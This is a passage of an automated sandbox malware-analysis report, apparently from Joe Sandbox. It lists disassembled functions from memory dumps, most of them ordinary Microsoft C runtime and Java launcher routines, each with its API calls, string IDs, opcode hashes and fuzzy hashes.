                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$FullNamePath__doserrno_getdrive_invalid_parameter
                                                                                                          • String ID: .$:.
                                                                                                          • API String ID: 366288646-2811378331
                                                                                                          • Opcode ID: 903f74c74622612975d534a39223298c58884333e413f5b2368ac0aebf51ae14
                                                                                                          • Instruction ID: b5e38ecf8e641571a3973ca9684fd4e30b4463df200be87d22494edceeac988f
                                                                                                          • Opcode Fuzzy Hash: 903f74c74622612975d534a39223298c58884333e413f5b2368ac0aebf51ae14
                                                                                                          • Instruction Fuzzy Hash: A031B0B550034AEBEB919FB4CE41B9E3BACEF41354F144566E9209B180EB70F9418772
                                                                                                          Function 6FDD6B96 Relevance: 25.7, APIs: 17, Instructions: 155COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6BB8
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6BC2
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                            • Part of subcall function 6FDD6D74: _unlock_file.MSVCR100(?,6FDD6D32,6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6D7A
                                                                                                            • Part of subcall function 6FDD6D74: _unlock.MSVCR100(00000002,6FDD6D32,6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6D82
                                                                                                          • _errno.MSVCR100(6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6BDA
                                                                                                          • _errno.MSVCR100(6FDD6D90,0000001C,6FDD6DC1,00000000,00000040), ref: 6FDD6D39
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo_unlock_unlock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 3680532398-0
                                                                                                          • Opcode ID: ca8c31ee52c246efc6c50748704c9cd78fd26502a6e5184a6d500d0e17db435f
                                                                                                          • Instruction ID: e8cf9fc7c80c5293ff43f54fa29487457484c58479d3c505f450a09fc29ebd96
                                                                                                          • Opcode Fuzzy Hash: ca8c31ee52c246efc6c50748704c9cd78fd26502a6e5184a6d500d0e17db435f
                                                                                                          • Instruction Fuzzy Hash: 88519371905309DADB80AFA8D881B9D7BB4BF0B358F10812AF564AF2C1DB7479418BE5
                                                                                                          Function 6FDBC1B7 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 224COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC1F1
                                                                                                          • memset.MSVCR100(00000000,00000000,00000024,00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC1FD
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000024,00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC214
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000024,00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC232
                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,6FDBBAB4), ref: 6FDBC25A
                                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 6FDBC261
                                                                                                          • memset.MSVCR100(00000002,00000000,?,?,?,?,?,?,00000000,?,?,6FDBBAB4), ref: 6FDBC27D
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000002,00000000,?,?,?,?,?,?,00000000,?,?,6FDBBAB4), ref: 6FDBC29D
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC2E8
                                                                                                          • memset.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC2F9
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,?,?,6FDBBAB4), ref: 6FDBC310
                                                                                                          • free.MSVCR100(?,?,?,?,?,00000000,?,?,6FDBBAB4), ref: 6FDBC421
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$Process$AffinityCurrentMaskfree
                                                                                                          • String ID: $$$
                                                                                                          • API String ID: 1945224313-233714265
                                                                                                          • Opcode ID: 9f4ebf6bf144a3297ba1ec84f250b9ac9fbd776d319135f7a0999a2118c9e6a2
                                                                                                          • Instruction ID: aeea24914e428df4fbf24d65228d4f81d9ed272e1590ef838bf7c29cc5810da8
                                                                                                          • Opcode Fuzzy Hash: 9f4ebf6bf144a3297ba1ec84f250b9ac9fbd776d319135f7a0999a2118c9e6a2
                                                                                                          • Instruction Fuzzy Hash: 9F8170B0A05614EFCB84DF68C59096DBBB4FB0A315750815FE806DB290DB71F961CF91
                                                                                                          Function 6FDC0122 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 172COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(00000008,32054ECC,?,?), ref: 6FDC015F
                                                                                                            • Part of subcall function 6FD8232B: malloc.MSVCR100(?), ref: 6FD82336
                                                                                                          • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR100(32054ECC,?,?), ref: 6FDC019A
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,32054ECC,?,?), ref: 6FDC01B3
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,32054ECC,?,?), ref: 6FDC01CE
                                                                                                          • memset.MSVCR100(?,00000000,?,32054ECC,?,?), ref: 6FDC01E2
                                                                                                          • memset.MSVCR100(?,00000000,?,32054ECC,?,?), ref: 6FDC01F5
                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,?,?,32054ECC,?,?), ref: 6FDC0245
                                                                                                          • GetLastError.KERNEL32(?,?,?,32054ECC,?,?), ref: 6FDC0255
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,?,?,32054ECC,?,?), ref: 6FDC026E
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000,?,?,?,32054ECC,?,?), ref: 6FDC027D
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(0000000C,?,?,?,32054ECC,?,?), ref: 6FDC0284
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,?,32054ECC,?,?), ref: 6FDC02B1
                                                                                                          • memset.MSVCR100(00000000,00000000,00000000,?,?,?,32054ECC,?,?), ref: 6FDC02C2
                                                                                                            • Part of subcall function 6FDC16D1: memset.MSVCR100(?,00000000,0000003E,00000000,00000000), ref: 6FDC16F0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$??2@Concurrency@@$??0scheduler_resource_allocation_error@Count@CreateErrorExceptionLastNodeProcessorSemaphoreThrowmalloc
                                                                                                          • String ID: `so
                                                                                                          • API String ID: 4229121664-3409735833
                                                                                                          • Opcode ID: 047965adeba1fb3ba84b603d763cd5638615dc5acef7bc70443d1968ed9d22d3
                                                                                                          • Instruction ID: 01fba0cd98465ccd4629f87e00bf8cc5033c6fdd32e913046042d412ac6b3d20
                                                                                                          • Opcode Fuzzy Hash: 047965adeba1fb3ba84b603d763cd5638615dc5acef7bc70443d1968ed9d22d3
                                                                                                          • Instruction Fuzzy Hash: 915191B15047019FD764DF38D885B6ABBE8FB49364F104A2EE16ACB2D0EB31B8418B51
                                                                                                          Function 6FD827E3 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 110COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(0000000D,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD82857
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD82869
                                                                                                          • _lock.MSVCR100(0000000C,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD82885
                                                                                                          • free.MSVCR100(00000000,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FD828B9
                                                                                                          • free.MSVCR100(00000000), ref: 6FDA7615
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7621
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA762D
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7639
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7645
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7651
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA765D
                                                                                                          • free.MSVCR100(?,6FD828C8,00000008,6FD82952,00000000,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7669
                                                                                                          • free.MSVCR100(?,?,6FD82976,00000000,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDA7675
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$_lock$CriticalDecrementEnterInterlockedSection
                                                                                                          • String ID: Jo
                                                                                                          • API String ID: 3254847666-2441139153
                                                                                                          • Opcode ID: a3fadc6cd65ffe7009e3cfbf96ae85d5e025f871cda066be800fdea3fb851815
                                                                                                          • Instruction ID: f04f6b7d25e81eae20430647f80f79227176acd461ae08471cc37b3894e86b57
                                                                                                          • Opcode Fuzzy Hash: a3fadc6cd65ffe7009e3cfbf96ae85d5e025f871cda066be800fdea3fb851815
                                                                                                          • Instruction Fuzzy Hash: A431B272646B01EADFD05B789E48B0E37B86F02B6EF24151ED4B49B1C4EB35F0808674
                                                                                                          Function 6FDCE9AB Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCE9DC
                                                                                                          • _errno.MSVCR100 ref: 6FDCE9E4
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCE9EF
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • SetCurrentDirectoryA.KERNEL32(?), ref: 6FDCE9FF
                                                                                                          • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 6FDCEA19
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000001), ref: 6FDCEA2F
                                                                                                          • GetCurrentDirectoryA.KERNEL32(00000001,00000000), ref: 6FDCEA4C
                                                                                                          • _mbctoupper.MSVCR100(?), ref: 6FDCEA72
                                                                                                          • SetEnvironmentVariableA.KERNEL32(0000003D,?), ref: 6FDCEA8F
                                                                                                          • free.MSVCR100(?), ref: 6FDCEABB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$EnvironmentVariable__doserrno_calloc_crt_errno_invalid_parameter_invalid_parameter_noinfo_mbctoupperfree
                                                                                                          • String ID: :$=
                                                                                                          • API String ID: 3457832400-2134709475
                                                                                                          • Opcode ID: f8eb7fddfd07524d176d6b7627f9824bad338e253078771ae64ae70c8cbfcbb0
                                                                                                          • Instruction ID: ca62136d8172a180669516d75d3c61f881696d5e6e1824aec71e9a9585da342a
                                                                                                          • Opcode Fuzzy Hash: f8eb7fddfd07524d176d6b7627f9824bad338e253078771ae64ae70c8cbfcbb0
                                                                                                          • Instruction Fuzzy Hash: 4131F3B19007689FDBA08B65CC067D977FCBF06324F14028AE165D7180DB70BA858EB2
                                                                                                          Function 00D01000 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 78memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • getenv.MSVCR100(_JAVA_LAUNCHER_DEBUG), ref: 00D01008
                                                                                                          • printf.MSVCR100(Windows original main args:), ref: 00D01020
                                                                                                          • printf.MSVCR100(wwwd_args[%d] = %s,00000000,?), ref: 00D0103E
                                                                                                          • GetCommandLineA.KERNEL32 ref: 00D0104D
                                                                                                          • JLI_CmdToArgs.JLI(00000000), ref: 00D01054
                                                                                                          • JLI_GetStdArgc.JLI(00000000), ref: 00D01059
                                                                                                          • JLI_MemAlloc.JLI(00000000,00000000), ref: 00D01068
                                                                                                          • JLI_GetStdArgs.JLI ref: 00D01071
                                                                                                          • JLI_Launch.JLI(00000000,00000000,00000002,00D03010,00000002,00D03018,1.8.0_92-b14,1.8,?,?,00000001,00000000,00000000,00000000), ref: 00D010C3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612359297.0000000000D00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612550523.0000000000D02000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612649247.0000000000D04000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_d00000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Argsprintf$AllocArgcCommandLaunchLinegetenv
                                                                                                          • String ID: 1.8$1.8.0_92-b14$Windows original main args:$_JAVA_LAUNCHER_DEBUG$wwwd_args[%d] = %s
                                                                                                          • API String ID: 436321348-2616121543
                                                                                                          • Opcode ID: b363227ff50e851d0c3ebe6a9e53d65471e83911afebfc6165845d5f00f6fce8
                                                                                                          • Instruction ID: 274134d803065657b79d348a1256c71e2460e0a730679b7e928858e79a6866a9
                                                                                                          • Opcode Fuzzy Hash: b363227ff50e851d0c3ebe6a9e53d65471e83911afebfc6165845d5f00f6fce8
                                                                                                          • Instruction Fuzzy Hash: 6221D279741350AFD320AFA9DC8AF2A7798EB49754B510029F68CC72D1DAB19C84CB71
                                                                                                          Function 6FDFE6B9 Relevance: 24.2, APIs: 16, Instructions: 166COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFE6FA
                                                                                                          • _calloc_crt.MSVCR100(?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6FDFE709
                                                                                                          • wcstombs_s.MSVCR100(?,00000000,00000000,?,7FFFFFFF,6FDFE890,00000020), ref: 6FDFE6DF
                                                                                                            • Part of subcall function 6FD85E00: _wcstombs_s_l.MSVCR100(?,?,?,?,?,00000000), ref: 6FD85E16
                                                                                                          • wcstombs_s.MSVCR100(00000000,00000000,?,?,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 6FDFE720
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFE73B
                                                                                                          • setlocale.MSVCR100(?,00000000,6FDFE890,00000020), ref: 6FDFE74D
                                                                                                          • free.MSVCR100(00000000,?,00000000,6FDFE890,00000020), ref: 6FDFE756
                                                                                                          • _getptd.MSVCR100 ref: 6FDFE763
                                                                                                          • _mbstowcs_s_l.MSVCR100(00000000,00000000,00000000,?,00000000,?), ref: 6FDFE788
                                                                                                          • _malloc_crt.MSVCR100(?), ref: 6FDFE7B9
                                                                                                          • _mbstowcs_s_l.MSVCR100(00000000,00000004,?,?,000000FF,?), ref: 6FDFE7E0
                                                                                                          • _lock.MSVCR100(0000000C), ref: 6FDFE80B
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FDFE821
                                                                                                          • free.MSVCR100(?), ref: 6FDFE82E
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FDFE84E
                                                                                                          • free.MSVCR100(?), ref: 6FDFE85B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$DecrementInterlocked_mbstowcs_s_lwcstombs_s$_calloc_crt_getptd_invoke_watson_lock_malloc_crt_wcstombs_s_lsetlocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 3979222642-0
                                                                                                          • Opcode ID: efac7ac4e46233ad2dd5c98b14e28840ccd7d473b81a875200c6436d1565ac50
                                                                                                          • Instruction ID: 8e2091611b7e1bee84aa7346ef304ee0649568225136c3e3d4b18dd00b096f32
                                                                                                          • Opcode Fuzzy Hash: efac7ac4e46233ad2dd5c98b14e28840ccd7d473b81a875200c6436d1565ac50
                                                                                                          • Instruction Fuzzy Hash: DA51F171D01708EACF91ABA8CC80D9D77F5AF49328B26461BE435D7190E735F9828B20
                                                                                                          Function 6FD82207 Relevance: 24.2, APIs: 16, Instructions: 165COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno$isleadbytembtowc
                                                                                                          • String ID:
                                                                                                          • API String ID: 3580289129-0
                                                                                                          • Opcode ID: 7a008a6fa1050a22d890e50c9900bb11f37999c18e44a6fba812245d0a792c1f
                                                                                                          • Instruction ID: df1f796cc4d677671377bf3d7b488b683074bfd94477114792fdac916d2ecc9b
                                                                                                          • Opcode Fuzzy Hash: 7a008a6fa1050a22d890e50c9900bb11f37999c18e44a6fba812245d0a792c1f
                                                                                                          • Instruction Fuzzy Hash: 7951F472009B51E9C3A54B78E8046AA7BA89F0373C720471EE4F99B1D1EB35B642C7A4
                                                                                                          Function 6FDD2F04 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wdupenv_s.MSVCR100(?,00000000,COMSPEC), ref: 6FDD2F1F
                                                                                                            • Part of subcall function 6FD90CD7: _lock.MSVCR100(00000007,6FD90D48,0000000C), ref: 6FD90CE5
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD2F35
                                                                                                            • Part of subcall function 6FDFAF2C: GetCurrentProcess.KERNEL32(C0000417), ref: 6FDFAF42
                                                                                                            • Part of subcall function 6FDFAF2C: TerminateProcess.KERNEL32(00000000), ref: 6FDFAF49
                                                                                                          • _waccess_s.MSVCR100(?,00000000), ref: 6FDD2F51
                                                                                                          • _errno.MSVCR100 ref: 6FDD2F73
                                                                                                          • _errno.MSVCR100 ref: 6FDD2F7A
                                                                                                          • _wspawnve.MSVCR100(00000000,?,?,00000000), ref: 6FDD2F8A
                                                                                                          • _errno.MSVCR100 ref: 6FDD2F94
                                                                                                          • _errno.MSVCR100 ref: 6FDD2FA7
                                                                                                          • _errno.MSVCR100 ref: 6FDD2FB1
                                                                                                          • _wspawnvpe.MSVCR100(00000000,cmd.exe,?,00000000), ref: 6FDD2FC7
                                                                                                          • free.MSVCR100(?), ref: 6FDD2FD5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$Process$CurrentTerminate_invoke_watson_lock_waccess_s_wdupenv_s_wspawnve_wspawnvpefree
                                                                                                          • String ID: COMSPEC$cmd.exe
                                                                                                          • API String ID: 3564675030-2256226045
                                                                                                          • Opcode ID: 514e83d86b0e9b699e055f3906de213e8457d594f9cb511e80011d12fb67a802
                                                                                                          • Instruction ID: 1300b4d212caa5953fdf513d43a6cab8e1e690ca18385df1776f87b64366b6fb
                                                                                                          • Opcode Fuzzy Hash: 514e83d86b0e9b699e055f3906de213e8457d594f9cb511e80011d12fb67a802
                                                                                                          • Instruction Fuzzy Hash: E62177B1D00314EE8B91AFBA88458AF77B8DF816597110659F811A7250E7307E40C7B1
                                                                                                          Function 6FDD2632 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _dupenv_s.MSVCR100(?,00000000,COMSPEC), ref: 6FDD264D
                                                                                                            • Part of subcall function 6FDFBAF4: _lock.MSVCR100(00000007,6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB02
                                                                                                            • Part of subcall function 6FDFBAF4: _errno.MSVCR100(6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB1B
                                                                                                            • Part of subcall function 6FDFBAF4: _invalid_parameter_noinfo.MSVCR100(6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB25
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD2663
                                                                                                            • Part of subcall function 6FDFAF2C: GetCurrentProcess.KERNEL32(C0000417), ref: 6FDFAF42
                                                                                                            • Part of subcall function 6FDFAF2C: TerminateProcess.KERNEL32(00000000), ref: 6FDFAF49
                                                                                                          • _access_s.MSVCR100(?,00000000), ref: 6FDD267F
                                                                                                          • _errno.MSVCR100 ref: 6FDD26A1
                                                                                                          • _errno.MSVCR100 ref: 6FDD26A8
                                                                                                          • _spawnve.MSVCR100(00000000,?,?,00000000), ref: 6FDD26B8
                                                                                                          • _errno.MSVCR100 ref: 6FDD26C2
                                                                                                          • _errno.MSVCR100 ref: 6FDD26D5
                                                                                                          • _errno.MSVCR100 ref: 6FDD26DF
                                                                                                          • _spawnvpe.MSVCR100(00000000,cmd.exe,?,00000000), ref: 6FDD26F5
                                                                                                          • free.MSVCR100(?), ref: 6FDD2703
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
